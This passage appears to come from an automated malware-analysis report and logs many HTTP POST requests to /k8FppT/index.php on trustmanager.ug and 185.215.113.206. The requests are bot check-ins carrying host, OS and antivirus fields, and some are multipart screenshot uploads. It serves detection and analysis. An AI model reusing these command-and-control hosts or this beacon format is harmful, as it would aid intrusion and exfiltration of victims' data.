Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cbHost: trustmanager.ugContent-Length: 93529Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cbHost: 185.215.113.206Content-Length: 93529Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cbHost: trustmanager.ugContent-Length: 93529Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cbHost: 185.215.113.206Content-Length: 93529Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: 185.215.113.206Content-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----144fedd53f2aeee09aa4dbce6b6e9e32Host: trustmanager.ugContent-Length: 93811Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: trustmanager.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
